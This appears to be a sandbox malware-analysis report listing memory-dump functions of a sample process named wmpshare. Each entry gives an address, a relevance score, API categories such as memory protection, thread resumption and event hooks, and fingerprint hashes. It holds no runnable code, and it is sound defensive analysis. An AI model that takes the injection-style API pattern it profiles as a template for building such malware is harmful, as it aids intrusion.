                                                                                                                                        • Opcode ID: 97221a5a18e4aacc6e4870847a1657838270caee770a845de3dac3f068ae24cc
                                                                                                                                        • Instruction ID: 91182a2cccdca6744482f31b812bd0c49a31c87f4a27d6e84e72d8d342d7da22
                                                                                                                                        • Opcode Fuzzy Hash: 97221a5a18e4aacc6e4870847a1657838270caee770a845de3dac3f068ae24cc
                                                                                                                                        • Instruction Fuzzy Hash: 3951E73421DE0D8FFB55EB6C948E36972D5F7A8300F50822DE489C35D6EE74D89A8B81
                                                                                                                                        Function 0000028186D5D7C0 Relevance: 3.2, APIs: 2, Instructions: 155fileCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseFileHandleView
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3964672402-0
                                                                                                                                        • Opcode ID: 2545b146e03987401e8860446111752460087adb5538b97f3e49e3c2a2eae485
                                                                                                                                        • Instruction ID: 30b3915cf8cb29e8aae390b66b6fc85eeddb94561c09a69fd5d812d2a67f2754
                                                                                                                                        • Opcode Fuzzy Hash: 2545b146e03987401e8860446111752460087adb5538b97f3e49e3c2a2eae485
                                                                                                                                        • Instruction Fuzzy Hash: 4A4170352199088FF745FB68D88EAA673D8EB95301F00422AA44AC25D7DF34E852CF85
                                                                                                                                        Function 0000028186D52978 Relevance: 3.1, APIs: 2, Instructions: 97memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                        • Opcode ID: 71851ab31bd5e99a8088f9e241981b9a75f35149f95cf9a9c2613fb5189a6f34
                                                                                                                                        • Instruction ID: 8ee802a8cae1c4ed012d02d4d42e65b3382849cbfd5e00eadbb88a0b87f89973
                                                                                                                                        • Opcode Fuzzy Hash: 71851ab31bd5e99a8088f9e241981b9a75f35149f95cf9a9c2613fb5189a6f34
                                                                                                                                        • Instruction Fuzzy Hash: AB31362420CA848BEB109B2CD89E7953BC5FB9A311F154395F8D9C72CACB58C807C785
                                                                                                                                        Function 00007DF4741B1740 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3434089996.00007DF4741B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4741B1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_7df4741b1000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                        • Opcode ID: 008c1c100189bfc35651791388f787f69f2d51d68de1c2a05aeaf1d2b03de7f2
                                                                                                                                        • Instruction ID: 7d049523b6a0ef256e6058a01d00241cf0994b08918056bbdcbed6534d975ae5
                                                                                                                                        • Opcode Fuzzy Hash: 008c1c100189bfc35651791388f787f69f2d51d68de1c2a05aeaf1d2b03de7f2
                                                                                                                                        • Instruction Fuzzy Hash: D221E53150858587DB18AB6DD488677B3F6FF94380F1A013AE88FC71A5D668EA01C2C5
                                                                                                                                        Function 00007DF4741E1740 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3434241766.00007DF4741E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4741E1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_7df4741e1000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                        • Opcode ID: 79a23d149b39818e3e43e8007e45963aa9a0f0bf87d1b18fa9329f731b042926
                                                                                                                                        • Instruction ID: 77328a90597f1a4af590cda28b9ad7f2d01a47803110e4a3dd13841572f6b303
                                                                                                                                        • Opcode Fuzzy Hash: 79a23d149b39818e3e43e8007e45963aa9a0f0bf87d1b18fa9329f731b042926
                                                                                                                                        • Instruction Fuzzy Hash: 6421073990855587D71CAB3CC448673B3F1FF94B02F15026AE48BC7194DA68EB41C2C5
                                                                                                                                        Function 00007DF4742012C8 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3434396750.00007DF474201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF474201000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_7df474201000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                        • Opcode ID: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
                                                                                                                                        • Instruction ID: 6509a15c92f0de86db16cef0a244db3a31a342375f1201d50e04ffb414546bf7
                                                                                                                                        • Opcode Fuzzy Hash: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
                                                                                                                                        • Instruction Fuzzy Hash: C121F33170868587EB188B288441676F3F1FF94380F14093AE8CBC7AB5E66FFA1182C4
                                                                                                                                        Function 00007DF4742012C8 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000003.3152628101.00007DF474201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF474201000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_3_7df474201000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProtectVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 544645111-0
                                                                                                                                        • Opcode ID: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
                                                                                                                                        • Instruction ID: cb9c5f1f3465f9a23be75860c79461e23f95b733699be7b6bb3eb1c64c7bd754
                                                                                                                                        • Opcode Fuzzy Hash: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
                                                                                                                                        • Instruction Fuzzy Hash: 4721E13170868587DB188B288440676F3E1FF94380F14493AE8CBC7AB5E66FFA1182C4
                                                                                                                                        Function 0000028186D5C994 Relevance: 2.8, APIs: 2, Instructions: 272COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: callocfree
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 306872129-0
                                                                                                                                        • Opcode ID: 95e0b7105a60c66ccf3cf853b29ca3c02cf426d78340e81cc55da608d90ff99a
                                                                                                                                        • Instruction ID: 56d659499d8d275d5b3f2dd92a8bf30e42181a9b0cdee488a24dbf1b5b076898
                                                                                                                                        • Opcode Fuzzy Hash: 95e0b7105a60c66ccf3cf853b29ca3c02cf426d78340e81cc55da608d90ff99a
                                                                                                                                        • Instruction Fuzzy Hash: 7C91453551DB484BE765EF14D48E7EAB3E5FB94300F408A2EE086C3593DE349956CB82
                                                                                                                                        Function 0000028186D5A9D4 Relevance: 2.5, APIs: 2, Instructions: 42COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1294909896-0
                                                                                                                                        • Opcode ID: f3ea22a6fa7cbad43c7f75ab5131f91595a366188be7b26cc18e59d3410828da
                                                                                                                                        • Instruction ID: 73fe3f2dec502add9ad8a8a99c4ec17b4a19c553cb885138b8f073e132cefe94
                                                                                                                                        • Opcode Fuzzy Hash: f3ea22a6fa7cbad43c7f75ab5131f91595a366188be7b26cc18e59d3410828da
                                                                                                                                        • Instruction Fuzzy Hash: E1F06D74215E1A4FEB85EF19C09D72073E4FB58306F6441299049C2991DB718C65CB01
                                                                                                                                        Function 0000028186D5CC9C Relevance: 1.7, APIs: 1, Instructions: 228fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                        • Opcode ID: f573dec0403348014450f7ba306745c6dd418323538c19bace6ad6f3c15519fa
                                                                                                                                        • Instruction ID: b0062248863edc98e461740766bddcbe8a4c73eb3b825839e16782a4947f89ce
                                                                                                                                        • Opcode Fuzzy Hash: f573dec0403348014450f7ba306745c6dd418323538c19bace6ad6f3c15519fa
                                                                                                                                        • Instruction Fuzzy Hash: D571B13520DA048FE769EB18D88EB6573E5FB94310F10861DE4CBC3592EE24E9578B85
                                                                                                                                        Function 00007DF4742015E8 Relevance: 1.7, APIs: 1, Instructions: 228COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000003.3152628101.00007DF474201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF474201000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_3_7df474201000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileMappingOpen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1680863896-0
                                                                                                                                        • Opcode ID: a4d7378eb0dc183d45dac9fde789c38604b4b9a60361aa9a1ccba498305d516d
                                                                                                                                        • Instruction ID: b4e589bafe24cd42e42a4f71aec2fa512fc0f944158eb0054bc67595c957416e
                                                                                                                                        • Opcode Fuzzy Hash: a4d7378eb0dc183d45dac9fde789c38604b4b9a60361aa9a1ccba498305d516d
                                                                                                                                        • Instruction Fuzzy Hash: 6671647061C7888BD775DB2994857BBB7E1FB98300F004A2EE5CFC2161EA39A91587D2
                                                                                                                                        Function 0000028186D56C68 Relevance: 1.6, APIs: 1, Instructions: 142COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                        • Opcode ID: f5a0fb9eb97d8a0cea1a0077705b63a589f7aa8c555666e722ed38cdf1e7e3b3
                                                                                                                                        • Instruction ID: 0281de81f39899662d8b1baaf55b4de317aeab845b819c9f2cc837e718f6730f
                                                                                                                                        • Opcode Fuzzy Hash: f5a0fb9eb97d8a0cea1a0077705b63a589f7aa8c555666e722ed38cdf1e7e3b3
                                                                                                                                        • Instruction Fuzzy Hash: 7B41BA392199480BFB59E738D89FBB972D9E7D4310F04871AB486C35E3EE24D9168B42
                                                                                                                                        Function 0000028186D577DC Relevance: 1.6, APIs: 1, Instructions: 137COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InformationVolume
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2039140958-0
                                                                                                                                        • Opcode ID: ab88d9938b3b72962f423333e66c75964dea025bf306d4a69d18b2f71a512dba
                                                                                                                                        • Instruction ID: fd6e34eea5c3385d6e073a56dc76cf8ea72e0f494af48cdd2105560c1b34f993
                                                                                                                                        • Opcode Fuzzy Hash: ab88d9938b3b72962f423333e66c75964dea025bf306d4a69d18b2f71a512dba
                                                                                                                                        • Instruction Fuzzy Hash: CE410B7511C6488BE76AEB24C8997DBB7E4FB94301F408B1DE08AC21D2EF759615CB82
                                                                                                                                        Function 00007DF4741E34A8 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3434241766.00007DF4741E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4741E1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_7df4741e1000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EventHook
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3661607649-0
                                                                                                                                        • Opcode ID: 5a2bbfa698742b6cae5652eefc388705153c62446812716ece3234e1382db74d
                                                                                                                                        • Instruction ID: 9e2dbe8d9b3d6bf64897a6401f9615b6468eeb40fcaff5f5b8bb40dc1025e304
                                                                                                                                        • Opcode Fuzzy Hash: 5a2bbfa698742b6cae5652eefc388705153c62446812716ece3234e1382db74d
                                                                                                                                        • Instruction Fuzzy Hash: 77316D31518A59CFEB54FB34C48957673B0FF65311F100A3AE08BC62A1DF38AA41DB81
                                                                                                                                        Function 0000028186D5CEE0 Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileRead
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                        • Opcode ID: 692895d7e566b00515affad7a4510cba5330249c96600c383c0354dec883b266
                                                                                                                                        • Instruction ID: aea51374bd046f61fcd6b3622de47688a57364887c61053153f20f8fde177df4
                                                                                                                                        • Opcode Fuzzy Hash: 692895d7e566b00515affad7a4510cba5330249c96600c383c0354dec883b266
                                                                                                                                        • Instruction Fuzzy Hash: 5F01887160850C8FE745EF18D8899A973E9FBD8314F50472AE48AC2151DF34DA168B81
                                                                                                                                        Function 0000028186D52908 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ResumeThread
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 947044025-0
                                                                                                                                        • Opcode ID: eb8efb70a255d3993e3c222089937f44c28cf696e92b085bcc04ab88a5b55cd8
                                                                                                                                        • Instruction ID: 01834f7b76f1e4e1eff4a07d779b8aea874edfd9acd893afb1834f4d49910f09
                                                                                                                                        • Opcode Fuzzy Hash: eb8efb70a255d3993e3c222089937f44c28cf696e92b085bcc04ab88a5b55cd8
                                                                                                                                        • Instruction Fuzzy Hash: 2A01F2357499198FFB54A729DC8D62533E5FB8A311B448164E84EC3295DA39A852CF80
                                                                                                                                        Function 00007DF4741B3CDC Relevance: 1.5, APIs: 1, Instructions: 49COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3434089996.00007DF4741B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4741B1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_7df4741b1000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EventHook
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3661607649-0
                                                                                                                                        • Opcode ID: 7e614b85896ac0b1141b176719915ed43944beda22e6c339024177dd55c03ccc
                                                                                                                                        • Instruction ID: af776ef8053e800db0d829c1bb42f2b873e2ea22f460041f98e6c7a8b79d38bc
                                                                                                                                        • Opcode Fuzzy Hash: 7e614b85896ac0b1141b176719915ed43944beda22e6c339024177dd55c03ccc
                                                                                                                                        • Instruction Fuzzy Hash: 17111B7081DA49DBE754BB24885977A72B0FF14314F940A2DD08FC15E2DA3CB665CA81
                                                                                                                                        Function 0000028186D5BEF0 Relevance: 1.5, APIs: 1, Instructions: 48libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                        • Opcode ID: abc4bbe606b124008aec48ef764282d5b057ec30dc72963a0fbe36d295726b2e
                                                                                                                                        • Instruction ID: 09a976bb05423c95bc4b3276fe2b39eac2e8f008abf4d7b96956635004452add
                                                                                                                                        • Opcode Fuzzy Hash: abc4bbe606b124008aec48ef764282d5b057ec30dc72963a0fbe36d295726b2e
                                                                                                                                        • Instruction Fuzzy Hash: 5701863461DA4C4FF745EB38885E76A369AEB54301F50C66AB48AC32D2DE28C9158B41
                                                                                                                                        Function 0000028186D52B54 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateHeap
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 10892065-0
                                                                                                                                        • Opcode ID: 897fafeead847303cd79d11afed6f4c8d1267b1295cf91a495235683339b4e9f
                                                                                                                                        • Instruction ID: ae0c751d02d7688b5c61240a29ea19994da05b5ee643921643ef6443fc1649ab
                                                                                                                                        • Opcode Fuzzy Hash: 897fafeead847303cd79d11afed6f4c8d1267b1295cf91a495235683339b4e9f
                                                                                                                                        • Instruction Fuzzy Hash: 61F0A76960EA05CBF754BF765C8F2152259D344312F548B3AA045C75C6DD39845A4701
                                                                                                                                        Function 0000028186D569B8 Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressCallerProc
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2663294120-0
                                                                                                                                        • Opcode ID: d995070f4c000868ee4da6d9934e01647bf6d928269a01321783332ab5c3360a
                                                                                                                                        • Instruction ID: ef06f61ce6a807c7507738138dc0e55c94342dd008fa10d55d659905ce951714
                                                                                                                                        • Opcode Fuzzy Hash: d995070f4c000868ee4da6d9934e01647bf6d928269a01321783332ab5c3360a
                                                                                                                                        • Instruction Fuzzy Hash: 76E0C211B09C190BBB7862AE248D67695CAC7DC172B14427BF41DC32D6ED50CC924790
                                                                                                                                        Function 00007DF4741B1708 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3434089996.00007DF4741B1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4741B1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_7df4741b1000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FunctionTable
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1252446317-0
                                                                                                                                        • Opcode ID: e917f39a39c33fe414eade99d1458f0d2d3e05fe92a720ed8b0375ca766d8558
                                                                                                                                        • Instruction ID: a15a48e211e0eb8d528170047f2e1adc6a87c75a1b5e2267541eb5765eea2bc8
                                                                                                                                        • Opcode Fuzzy Hash: e917f39a39c33fe414eade99d1458f0d2d3e05fe92a720ed8b0375ca766d8558
                                                                                                                                        • Instruction Fuzzy Hash: F6E04F305009098BEB98E61DC88D7A036E1EB58306F644269D845CA2A1CB39949BCF81
                                                                                                                                        Function 00007DF4741E1708 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3434241766.00007DF4741E1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4741E1000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_7df4741e1000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FunctionTable
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1252446317-0
                                                                                                                                        • Opcode ID: 18eb6388586fc4d6c2a3579563bef3692ffb62769f7eb08bbe6ffb4e199480d7
                                                                                                                                        • Instruction ID: 31a5fe46a8abc6faf9a7b2f9891fdb0c2dd4a6b224dd8d0d7c196fd972cc17e3
                                                                                                                                        • Opcode Fuzzy Hash: 18eb6388586fc4d6c2a3579563bef3692ffb62769f7eb08bbe6ffb4e199480d7
                                                                                                                                        • Instruction Fuzzy Hash: 34E04F345009058BEBA8E72DC84E7603AE0FB58306F6042A9D445CA291CB3D959BCF81
                                                                                                                                        Function 00007DF474201290 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3434396750.00007DF474201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF474201000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_7df474201000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FunctionTable
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1252446317-0
                                                                                                                                        • Opcode ID: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
                                                                                                                                        • Instruction ID: fdb6f46d6ab8a50b790d1d669cbf0ea6d8ef8898dd7bfcc3bbbc7c6bd93d51af
                                                                                                                                        • Opcode Fuzzy Hash: cff89ce48d21670ef986fb34dbe231ab83686b2b911df37c38ad495f9c0b2048
                                                                                                                                        • Instruction Fuzzy Hash: 79E04F30A049058FEB98D61DC80976036E0FB5C306F608669D505C92A1DB3E98ABCF81
                                                                                                                                        Function 0000028186D574F0 Relevance: 1.5, APIs: 1, Instructions: 276COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                        • Opcode ID: 306f73362989c91bfaffd3666fa505f5868a1dafee964194c29bb12492c75fc6
                                                                                                                                        • Instruction ID: 83f63047b72d9d1928eb19233b523db28cb5715a7370172e69b97d7a1b82049e
                                                                                                                                        • Opcode Fuzzy Hash: 306f73362989c91bfaffd3666fa505f5868a1dafee964194c29bb12492c75fc6
                                                                                                                                        • Instruction Fuzzy Hash: 6D91503421DA098FEB45EF18D48EAEA73E4FB54300F548659F48ACB597DE30E856CB81
                                                                                                                                        Function 0000028186D53C88 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_2_28186d51000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FunctionTable
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1252446317-0
                                                                                                                                        • Opcode ID: e973a519ee2ebc5e911fb478164db4f9dda36e27b6cb7c6046375041e7ff95af
                                                                                                                                        • Instruction ID: fb5f16e45eff13333fc916a891c4fd8a6abbd89fbfd7990b521ada2a72456c2d
                                                                                                                                        • Opcode Fuzzy Hash: e973a519ee2ebc5e911fb478164db4f9dda36e27b6cb7c6046375041e7ff95af
                                                                                                                                        • Instruction Fuzzy Hash: 90E04F341019054BEFA8DB1DC84D36036D0E798306FA08258E445C92D1DB39C8BBCF82
                                                                                                                                        Function 00007DF474201290 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000003.3152628101.00007DF474201000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF474201000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_34_3_7df474201000_wmpshare.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FunctionTable
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1252446317-0
                                                                                                                                        • Opcode ID: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
                                                                                                                                        • Instruction ID: 405b65cbef588c31230f1cf399df455fa939b5ddb6b0d6b7355e1cc552c5507b
                                                                                                                                        • Opcode Fuzzy Hash: fc492990cf9c193ed0fed28dab1318ef1c2e9243cee28bd6a774944ac56baf31
                                                                                                                                        • Instruction Fuzzy Hash: CFE04F30A049059FEB98D61DC8097603AE0FB5830AF608669D505C92A1DB7E94ABCF81
                                                                                                                                        Function 0000028186D5698C Relevance: 1.5, APIs: 1, Instructions: 24libraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000022.00000002.3432219356.0000028186D51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000028186D51000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
